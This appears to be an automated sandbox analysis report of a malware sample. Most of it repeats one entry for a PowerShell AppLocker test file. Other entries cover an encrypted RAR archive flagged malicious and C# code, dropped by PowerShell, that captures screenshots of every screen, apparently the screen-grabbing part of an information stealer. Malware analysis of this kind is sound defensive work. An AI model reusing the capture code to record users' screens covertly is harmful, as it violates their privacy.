                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe
                                                                                                                                                                                                                                              File Type:RAR archive data, v5
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):729406
                                                                                                                                                                                                                                              Entropy (8bit):7.999758921958358
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:12288:mryoCQWOiKEsvJFgQvgOTami4MEI7HFbRisPblh9W3xKyvQh0YSdbs459PTLbNBA:mHCQPMmlaminbj3Iyiddbn5RbN3k7
                                                                                                                                                                                                                                              MD5:CD82356DC5F21242B129D489AAAD4738
                                                                                                                                                                                                                                              SHA1:AD7539F7F307EE4B0D186817C49BDBD8C24DDB5F
                                                                                                                                                                                                                                              SHA-256:E1534E40AF42F84ED4180AEC291CE2F06C545202C4B288989F29D3700177907F
                                                                                                                                                                                                                                              SHA-512:D0FBC4B3E7EDE388BD605093502CE6745BC276DF204CC7E981097593A3BEA930E94365D6F0CF9DAA9279DAE6B6A77B366935EE5108022D1ED4BE01C0BAFF9EDE
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:Rar!......*X!.....H.....J4mm}...s!.6....q...P......[..`....Y.a.>'y..w.....W.~..y.tm....T......w.<..Lbq..%#%..%........,D..w...%..P..].f.|...@qv...`. ..I.~.,,..9.65S.\i.cJY.%W..7cg?.$.z.T.Q..!Ms.!A^=.w..B.....V.-...X~..k.$..|..e.......u.Y.oZ/.W.>.aR..I:F.TH$b..0...N.)...n.e..,....w..........=..c.......+R....j7._.B...... ....(...f....8zU....$Q. ?J,.....-....vH..d:.K.y.E.../..Gdnt.....*#Vz..u......'..'O.9...J..MW..#K]tQ.4......]H....j..&_..K.1O..9.s..74.8....c....?...j?1.\.&)PI..t<5Q.v..yOx0.I..E.nb...Xg.0o..@.Vo....c.0.+...*..ZE.....S._...oU.h.I .Q....N;...D"......P.J....k........-.1o.|.*...n.....4.f..iZA.-W.....R.3._.../..`.N...p-dx`SS.......Jn:.yS.-..u.1IIx.r&L=[..C.vl.....I..zY0...."....B...;..K.....`$..i@........I/.a54.F.Qf.p.:.0....8.E..q.........{ZA...In.....[1?Nz.O...U....?.a..4......X..C<B....-.~h...J.)/..4.{h......&.G]..fX..;..~..tIr.....^...k..Q..E.a.....k@T~De.....r..~..D@/P.#.+..8..&f<A\..Z6]v.M.?(z.....E...6bh.^.q.v
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                                              Entropy (8bit):3.083274228953474
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBZIak7Ynqq6ZdPN5Dlq5J:+RI+ycuZhNVIakS0dPNnqX
                                                                                                                                                                                                                                              MD5:3E5BAE4EAF892895C777CFC9C7A5E1CD
                                                                                                                                                                                                                                              SHA1:13FC7E467D044F7DED26F8195C5ABC1A102C9770
                                                                                                                                                                                                                                              SHA-256:F5DF5C0A5135F9A2C9C7D5DD84667D8B801AAD4EB6AF2FC5829C88851D873DCC
                                                                                                                                                                                                                                              SHA-512:EF535A2A1B21384E791C124A3D71AA1A2E3712A7DC587D7EA4E3BFD62E663747716A110FF48CF2508E381C521ED764E7FB172EE99BFC60FB4D8124A29CCD828E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.s.e.s.4.c.5.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.s.e.s.4.c.5.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1004
                                                                                                                                                                                                                                              Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                              MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                              SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                              SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                              SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):613
                                                                                                                                                                                                                                              Entropy (8bit):5.28856837347535
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5N723T:p37Lvkmb6KOkqe1xBkrk+ik/a4WZETa1
